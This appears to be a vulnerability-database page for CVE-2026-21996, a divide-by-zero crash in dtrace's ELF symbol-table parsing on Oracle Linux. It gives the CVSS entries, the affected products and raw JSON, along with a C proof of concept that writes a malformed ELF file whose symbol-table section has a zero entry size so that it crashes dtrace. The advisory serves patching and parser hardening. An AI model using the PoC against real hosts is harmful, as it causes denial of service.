Security Vulnerability Report
CVE-2026-21996 CVSS 3.3 LOW

CVE-2026-21996

Published: 2026-05-01 18:16:14
Last Modified: 2026-05-05 17:45:58

Description

An unprivileged attacker can reliably trigger a crash of the dtrace process with a malicious ELF binary due to an integer divide-by-zero in Pbuild_file_symtab().

CVSS Details

CVSS Score
3.3
Severity
LOW
CVSS Vector
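CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
Note: the raw JSON record on this page carries two CVSS 3.1 entries. The score shown above is the entry typed "Secondary"; the entry typed "Primary" rates the availability impact as High (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H, base score 5.5, MEDIUM). Triage against whichever entry matches how dtrace is used on the affected host.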

Configurations (Affected Products)

cpe:2.3:o:oracle:linux:8:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:oracle:linux:9:0:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:oracle:linux:10:0:*:*:*:*:*:* - VULNERABLE
DTrace (see the vendor advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
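/*
 * PoC for CVE-2026-21996
 * This code generates a malformed ELF binary designed to trigger
 * the integer divide-by-zero in Pbuild_file_symtab().
 *
 * The program writes a file named "malicious_elf" in the current directory
 * containing one ELF64 header immediately followed by a single section
 * header of type SHT_SYMTAB whose sh_entsize and sh_size are both zero.
 *
 * Defensive reading: the record for this CVE classifies the flaw as CWE-369
 * (divide by zero). A symbol-table parser has to validate the entry size of
 * a symbol-table section (non-zero, and at least the size of one symbol
 * record) before using it as a divisor, and should reject or skip the
 * section otherwise.
 *
 * NOTE(review): the body of Pbuild_file_symtab() is not shown alongside this
 * listing, so which header field ends up as the divisor is the PoC author's
 * assumption -- confirm against the vendor fix.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

// ELF Header structure (simplified for 64-bit)
typedef struct {
    unsigned char e_ident[16];
    uint16_t e_type;
    uint16_t e_machine;
    uint32_t e_version;
    uint64_t e_entry;
    uint64_t e_phoff;
    uint64_t e_shoff;
    uint32_t e_flags;
    uint16_t e_ehsize;
    uint16_t e_phentsize;
    uint16_t e_phnum;
    uint16_t e_shentsize;
    uint16_t e_shnum;
    uint16_t e_shstrndx;
} Elf64_Ehdr;

// Section Header structure
typedef struct {
    uint32_t sh_name;
    uint32_t sh_type;
    uint64_t sh_flags;
    uint64_t sh_addr;
    uint64_t sh_offset;
    uint64_t sh_size;
    uint32_t sh_link;
    uint32_t sh_info;
    uint64_t sh_addralign;
    uint64_t sh_entsize;
} Elf64_Shdr;

/*
 * Writes the two-record test file and reports the outcome.
 *
 * Returns 0 when both records were written and the file was closed cleanly,
 * 1 when the file could not be created, written or closed. Command-line
 * arguments are not used.
 */
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    FILE *fp = fopen("malicious_elf", "wb");
    if (!fp) {
        perror("Failed to create file");
        return 1;
    }

    // 1. Setup ELF Header
    Elf64_Ehdr ehdr;
    memset(&ehdr, 0, sizeof(ehdr));
    memcpy(ehdr.e_ident, "\x7f" "ELF", 4);
    ehdr.e_ident[4] = 2;   // ELFCLASS64
    ehdr.e_ident[5] = 1;   // ELFDATA2LSB
    ehdr.e_ident[6] = 1;   // EV_CURRENT
    ehdr.e_type = 2;       // ET_EXEC
    ehdr.e_machine = 62;   // EM_X86_64
    ehdr.e_version = 1;
    ehdr.e_shoff = sizeof(ehdr);   // Section header right after ELF header
    ehdr.e_ehsize = sizeof(ehdr);
    ehdr.e_shentsize = sizeof(Elf64_Shdr);
    ehdr.e_shnum = 1;      // One section header

    // A short write would leave a truncated file while still printing the
    // success banner, so the result of every write is checked.
    if (fwrite(&ehdr, sizeof(ehdr), 1, fp) != 1) {
        perror("Failed to write ELF header");
        fclose(fp);
        return 1;
    }

    // 2. Setup Malicious Section Header (Symtab)
    Elf64_Shdr shdr;
    memset(&shdr, 0, sizeof(shdr));
    shdr.sh_type = 2;      // SHT_SYMTAB
    // Logic: If parser divides by sh_entsize or sh_size without checking,
    // setting them to 0 triggers the crash.
    shdr.sh_entsize = 0;
    shdr.sh_size = 0;

    if (fwrite(&shdr, sizeof(shdr), 1, fp) != 1) {
        perror("Failed to write section header");
        fclose(fp);
        return 1;
    }

    // fclose() flushes buffered data; a failure here means the file on disk
    // is incomplete.
    if (fclose(fp) != 0) {
        perror("Failed to close file");
        return 1;
    }

    printf("[+] Malicious ELF 'malicious_elf' created.\n");
    printf("[+] Trigger: Run dtrace against this file to crash the process.\n");
    return 0;
}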

References

https://linux.oracle.com/cve/CVE-2026-21996.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21996", "sourceIdentifier": "[email protected]", "published": "2026-05-01T18:16:13.750", "lastModified": "2026-05-05T17:45:58.153", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unprivileged attacker can reliably trigger a crash of the dtrace process with a malicious ELF binary due to an integer Divide-by-Zero in Pbuild_file_symtab()"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-369"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:oracle:linux:8:-:*:*:*:*:*:*", "matchCriteriaId": "CA9021D6-6027-42E9-A12D-7EA32C5C63F1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:oracle:linux:9:0:*:*:*:*:*:*", "matchCriteriaId": "C848CA1D-A42D-4AF1-9D95-E6268F9C1880"}, {"vulnerable": true, "criteria": "cpe:2.3:o:oracle:linux:10:0:*:*:*:*:*:*", "matchCriteriaId": "1F606DC6-31B5-4102-B174-D565662C4829"}]}]}], 
"references": [{"url": "https://linux.oracle.com/cve/CVE-2026-21996.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}